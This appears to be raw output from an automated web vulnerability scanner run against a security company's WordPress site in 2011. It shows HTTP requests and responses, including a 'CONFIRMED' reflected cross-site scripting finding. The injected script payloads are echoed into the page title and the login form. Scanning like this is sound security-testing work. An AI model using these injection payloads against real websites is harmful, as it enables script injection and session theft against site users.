<link rel="stylesheet" href="https://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="https://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="https://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='https://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='https://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='https://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='https://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,405] --><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="https://www.digitalbond.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('https://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="https://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="error404">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="https://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="https://www.digitalbond.com/"><img class="logo" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=10" title="Emerging Threats Pro"><img src="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/uploads/SqJJy8_ad_april_2011_42K_v2-2.jpg" alt="Emerging Threats Pro" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="https://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Main Column -->
<td id="middle">
<h2>Subscriber Content or Not Found</h2>
<p>Sorry, but the content you want is subscriber only. Lucky for you, subscribing to digitalbond.com is free. <b>Go to the right sidebar and either login or register.</b></p>
<p>If you are already logged in, then the requested link is broken or unavailable.</p>
</td>
<!-- / Main Column -->
<!-- Right Inner Sidebar -->
<!-- Right Sidebar -->
<td id="right">
<div id="search-3" class="widget widget_search"><form method="get" class="searchform" action="https://www.digitalbond.com/">
<table class="searchform" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="searchfield">
<input type="text" class="text inputblur" value="" name="s" />
</td>
<td class="searchbutton">
<input name="submit" value="Search" type="image" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/magnifier2-gray.gif" style="display: block; border:none; padding: 0 0 0 5px; margin: 0;" />
</td>
</tr></table>
</form></div><div id="text-6" class="widget widget_text"><div class="widget-title"><h3> </h3></div> <div class="textwidget"><p><b>Subscribe</b>: <a href="http://feeds.feedburner.com/digitalbond/oLPM"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_rss4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://feedburner.google.com/fb/a/mailverify?uri=digitalbond&loc=en_US"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_email4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://twitter.com/digitalbond"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_twitter4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a></p></div> </div><div id="text-7" class="widget widget_text"> <div class="textwidget"><p><b>Got a hot tip? See something interesting in SCADA Security?</b> <a href="mailto:info@digitalbond.com">Tell Us</a></p></div> </div><div id="wp_sidebarlogin-3" class="widget widget_wp_sidebarlogin"><div class="widget-title"><h3><span>Login</span></h3></div><form method="post" action="https://www.digitalbond.com/wp-admin/css/login.css\'\"--></style></script><script>netsparker(0x000406)</script>/?_login=224a45f4e0"> <p><label for="user_login">Username:</label><br/><input name="log" value="" class="mid" id="user_login" type="text" /></p>
<p><label for="user_pass">Password:</label><br/><input name="pwd" class="mid" id="user_pass" type="password" /></p>
<input type="hidden" name="redirect_to" value="https://www.digitalbond.com/wp-admin/css/login.css\'\"--></style></script><script>netsparker(0x000406)</script>/?_login=7df5623adb" />
<p class="rememberme"><input name="rememberme" class="checkbox" id="rememberme" value="forever" type="checkbox" /> <label for="rememberme">Remember me</label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" value="Login »" />
<input type="hidden" name="sidebarlogin_posted" value="1" />
<input type="hidden" name="testcookie" value="1" /></p>
</form>
<ul class="sidebarlogin_otherlinks"> <li><a href="https://www.digitalbond.com/wp-login.php?action=register" rel="nofollow">Register</a></li>
<li><a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="" rel="nofollow">Lost your password?</a></li>
</ul></div><div id="text-8" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br</p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p><p><a href="http://digitalbond.com/critical-intelligence/"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/Critintel_logo_250.jpg" alt="" title="Critintel_logo_250" width="250" height="143" class="aligncenter size-full wp-image-8808" /></a></p></div> </div><div id="kb-advanced-rss-3" class="widget widget_kbrss"><div class="widget-title"><h3><a class="kbrsswidget" href="http://feeds.critical-intelligence.com/?type=worth" title="Syndicate this content"><img width="14" height="14" src="http://digibond.wpengine.netdna-cdn.com/wp-includes/images/rss.png" alt="RSS" style="background:orange;color:white;" /></a> Worth Reading</h3></div><ul><li><a class='kbrsswidget' href='http://granitekey.blogspot.com/2011/04/executive-level-apathy-for.html' title='I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the circumstances. Hear me out for a moment before throwing daggers. '>Executive Level Apathy For Security...Maybe Not So Much </a></br> I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the ci</li></br><li><a class='kbrsswidget' href='http://community.controlglobal.com/content/nerc-cyber-attack-task-force-addressing-appropriate-issues' title='The scenario being addressed is an organize..
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:35 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11394
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-admin Css Login Css'"-->< Style>< Script><script>netsparker(0x000406)< Script></title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="https://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="https://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="https://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='https://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='https://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='https://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='https://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,405] --><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="https://www.digitalbond.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('https://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="https://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="error404">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="https://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="https://www.digitalbond.com/"><img class="logo" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=10" title="Emerging Threats Pro"><img src="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/uploads/SqJJy8_ad_april_2011_42K_v2-2.jpg" alt="Emerging Threats Pro" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="https://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Main Column -->
<td id="middle">
<h2>Subscriber Content or Not Found</h2>
<p>Sorry, but the content you want is subscriber only. Lucky for you, subscribing to digitalbond.com is free. <b>Go to the right sidebar and either login or register.</b></p>
<p>If you are already logged in, then the requested link is broken or unavailable.</p>
</td>
<!-- / Main Column -->
<!-- Right Inner Sidebar -->
<!-- Right Sidebar -->
<td id="right">
<div id="search-3" class="widget widget_search"><form method="get" class="searchform" action="https://www.digitalbond.com/">
<table class="searchform" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="searchfield">
<input type="text" class="text inputblur" value="" name="s" />
</td>
<td class="searchbutton">
<input name="submit" value="Search" type="image" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/magnifier2-gray.gif" style="display: block; border:none; padding: 0 0 0 5px; margin: 0;" />
</td>
</tr></table>
</form></div><div id="text-6" class="widget widget_text"><div class="widget-title"><h3> </h3></div> <div class="textwidget"><p><b>Subscribe</b>: <a href="http://feeds.feedburner.com/digitalbond/oLPM"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_rss4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://feedburner.google.com/fb/a/mailverify?uri=digitalbond&loc=en_US"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_email4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://twitter.com/digitalbond"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_twitter4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a></p></div> </div><div id="text-7" class="widget widget_text"> <div class="textwidget"><p><b>Got a hot tip? See something interesting in SCADA Security?</b> <a href="mailto:info@digitalbond.com">Tell Us</a></p></div> </div><div id="wp_sidebarlogin-3" class="widget widget_wp_sidebarlogin"><div class="widget-title"><h3><span>Login</span></h3></div><form method="post" action="https://www.digitalbond.com/wp-admin/css/login.css\'\"--></style></script><script>netsparker(0x000406)</script>/?_login=224a45f4e0"> <p><label for="user_login">Username:</label><br/><input name="log" value="" class="mid" id="user_login" type="text" /></p>
<p><label for="user_pass">Password:</label><br/><input name="pwd" class="mid" id="user_pass" type="password" /></p>
<input type="hidden" name="redirect_to" value="https://www.digitalbond.com/wp-admin/css/login.css\'\"--></style></script><script>netsparker(0x000406)</script>/?_login=7df5623adb" />
<p class="rememberme"><input name="rememberme" class="checkbox" id="rememberme" value="forever" type="checkbox" /> <label for="rememberme">Remember me</label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" value="Login »" />
<input type="hidden" name="sidebarlogin_posted" value="1" />
<input type="hidden" name="testcookie" value="1" /></p>
</form>
<ul class="sidebarlogin_otherlinks"> <li><a href="https://www.digitalbond.com/wp-login.php?action=register" rel="nofollow">Register</a></li>
<li><a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="" rel="nofollow">Lost your password?</a></li>
</ul></div><div id="text-8" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br</p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p><p><a href="http://digitalbond.com/critical-intelligence/"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/Critintel_logo_250.jpg" alt="" title="Critintel_logo_250" width="250" height="143" class="aligncenter size-full wp-image-8808" /></a></p></div> </div><div id="kb-advanced-rss-3" class="widget widget_kbrss"><div class="widget-title"><h3><a class="kbrsswidget" href="http://feeds.critical-intelligence.com/?type=worth" title="Syndicate this content"><img width="14" height="14" src="http://digibond.wpengine.netdna-cdn.com/wp-includes/images/rss.png" alt="RSS" style="background:orange;color:white;" /></a> Worth Reading</h3></div><ul><li><a class='kbrsswidget' href='http://granitekey.blogspot.com/2011/04/executive-level-apathy-for.html' title='I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the circumstances. Hear me out for a moment before throwing daggers. '>Executive Level Apathy For Security...Maybe Not So Much </a></br> I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the ci</li></br><li><a class='kbrsswidget' href='http://community.controlglobal.com/content/nerc-cyber-attack-task-force-addressing-appropriate-issues' title='The scenario being addressed is an organize..
|
- /wp-content/themes/atahualpa/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000467)%3C/script%3E
/wp-content/themes/atahualpa/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000467)%3C/script%3E CONFIRMED |
Parameters
| Parameter | Type | Value |
| URI-BASED | Raw URI | '"--></style></script><script>alert(0x000467)</script> |
Request
GET /wp-content/themes/atahualpa/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000467)%3C/script%3E HTTP/1.1
Referer: https://www.digitalbond.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=c08c5868e098031ab723f6ece5332be2; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Referer: https://www.digitalbond.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=c08c5868e098031ab723f6ece5332be2; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:35 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11360
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-content Themes Atahualpa '"-->< Style>< Script><script>netsparker(0x000467)< Script></title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="https://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="https://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="https://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='https://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='https://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='https://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='https://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,405] --><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="https://www.digitalbond.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('https://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
